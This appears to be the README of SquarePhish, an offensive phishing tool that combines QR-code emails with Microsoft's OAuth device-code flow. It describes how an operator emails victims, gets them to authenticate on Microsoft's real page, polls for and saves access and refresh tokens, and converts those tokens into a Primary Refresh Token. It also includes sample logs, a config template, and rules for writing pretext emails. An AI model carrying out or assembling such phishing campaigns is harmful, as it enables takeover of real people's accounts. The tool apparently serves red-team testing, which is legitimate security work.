SquarePhish is an advanced phishing tool that uses a technique combining the OAuth Device Code authentication flow and QR codes.
See PhishInSuits for more details on using OAuth Device Code flow for phishing attacks.
An attacker will send an initial email to the victim that contains a QR code pointing at the SquarePhish server. The idea behind this is to wait until the user is actively reviewing their email before we trigger the OAuth Device Code flow that has a 15 minute expiration window.
The current client id is: Microsoft Authentication Broker
The current scope is: .default offline_access profile openid
INF[2025/04/20 02:29:30] Email sent to victim(s): [email protected]
The victim will then scan the QR code found in the email body with their mobile device. The QR code will direct the victim to the attacker controlled SquarePhish server, with a URL paramater set to their email address. Once the SquarePhish server recieves the incoming QR code scan request, the victim will be automatically redirected to Microsoft.
When the SquarePhish server recieves the incoming QR code scan request, the OAuth Device Code authentication flow is intiated. The retrieved 'user code' is then sent via email to the victim where they are directed to enter the code into the legitimate Microsoft Device Code website.
Once the email is sent to the victim, a goroutine is started that continues to poll the Microsoft Device Code endpoint for valid authentication. This will poll until the device code expires (15 minutes).
INF[2025/04/20 02:29:34] [[email protected]] Link triggered
INF[2025/04/20 02:29:34] [[email protected]] Initializing device code flow...
INF[2025/04/20 02:29:34] [[email protected]] Client ID: 29d9ed98-a469-4536-ade2-f981bc1d605e
INF[2025/04/20 02:29:34] [[email protected]] Scope: .default offline_access profile openid
The victim recieves the second email containing the device user code. The victim then enters the code and continues through the authentication process on Microsoft's Device Code page.
Once valid authentication occurs, the background polling retrieves and saves the access and refresh key data.
INF[2025/04/20 02:29:40] [[email protected]] Polling for user authentication...
INF[2025/04/20 02:29:40] [[email protected]] Polling for user authentication...
INF[2025/04/20 02:29:40] [[email protected]] Authentication successful
INF[2025/04/20 02:29:40] [[email protected]] Token retrieved and saved to database
SquarePhish does not have authentication in front of the admin dashboard and as a result should be run behind a firewall and not exposed to the internet.
usage: squarephish [<flags>]
Flags:
-h, --[no-]help Show context-sensitive help (also try --help-long and --help-man).
-c, --config="config.json" Path to the config file
-v, --[no-]verbose Enable verbose logging
--[no-]version Show application version.
example: ./squarephish --config config.json
Modify the included configuration file config.json or use the below template:
{
"dashboard_server": {
"listen_url": "127.0.0.1:8080",
"cert_path": "",
"key_path": "",
"use_tls": false
},
"phish_server": {
"listen_url": "0.0.0.0:8443",
"cert_path": "server.crt",
"key_path": "server.key",
"use_tls": true
}
}The dashboard view lets the operator view simple metrics relating to the current campaign. Metrics include the number of emails sent, the number QR codes that have been scanned, and a list of credentials retrieved. Each credential can be viewed in a new tab as a JSON object.
The configuration pages lets the operator set the core settings for SquarePhish. The following settings are to be configured:
- SMTP host and credentials
- SquarePhish server settings (to be used when generating the initial QR code)
- Subject and Sender for all emails (QR code and device code)
- The device code email body template (used automatically when a QR code is scanned)
The send email page lets an operator specify a recipient and an initial QR code email template. The operator can then send emails to all recipient(s).
Included is a function from @denniskniep's DeviceCodePhishing PoC that will automatically retrieve the authentication URL based on the generated device code. This technique removes the requirement for sending a second email to the victim containing the device code. Instead, once the QR code is scanned or the URL is clicked, the victim will be automatically redirected directly to the authentication page for the given OAuth flow.
The included snippet from DeviceCodePhishing is licensed under Apache2.0
When using the Microsoft Authentication Broker client id, an attacker can take the returned refresh token and convert it into a Primary Refresh Token (PRT) using the included gimmePRT Python tool.
Currently, SquarePhish provides several pretext references that can be found in the pretexts folder.
Important: When writing a custom pretext, note the required data for the following emails:
- QR Code Email: Include
<img src="cid:qrcode">for QR image insertion. - ASCII QR Code Email: Include
{QR_CODE}for QR image insertion. - Device Code Email: Include
{DEVICE_CODE}for device user code insertion.
The original version of SquarePhish, written in Python, is hosted here.